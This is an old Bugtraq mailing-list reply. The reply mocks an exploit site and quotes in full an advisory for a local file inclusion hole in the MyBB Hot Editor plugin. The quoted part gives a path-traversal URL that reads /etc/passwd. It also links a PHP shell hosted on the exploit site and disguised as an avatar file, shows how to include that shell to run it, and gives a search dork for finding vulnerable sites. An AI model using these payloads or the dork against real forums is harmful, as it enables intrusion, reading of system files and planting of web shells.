Re: Mybb Hot Editor Plugin Local File Inclusion

看板Bugtraq作者時間19年前 (2007/04/10 01:28), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串2/3 (看更多)
expw0rm dude? That is a pretty weak attempt at mirroring milw0rm.com you pretty much copied str0kes layout except you added your own crappy colors. how nice of you. -KF On Apr 9, 2007, at 9:40 AM, liz0@expw0rm.com wrote: > <?php > /* > Vendor : Liz0ziM > Web : www.expw0rm.com > Mail : liz0@expw0rm.com > --------------------------------------- > Vul. Code : keyboard.php line 3 > > > require_once "./vk_code/$first"; > ---------------------------------------- > > > */ > > http://victim.com/[path]/richedit/keyboard.php? > first=../../../../../../../../../../../../../../../../../etc/passwd > > And > > upload php shell = > http://www.expw0rm.com/avatar_36.zip > > http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/ > avatars/avatar_36.gif => target isn't show with ie.plese you use > firefox > > Dork: "MTR Paket :" > ?> > > // Exploit Worm www.expw0rm.com > > orginal: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file- > inclusion_no114.html
文章代碼(AID): #166dUq00 (Bugtraq)
文章代碼(AID): #166dUq00 (Bugtraq)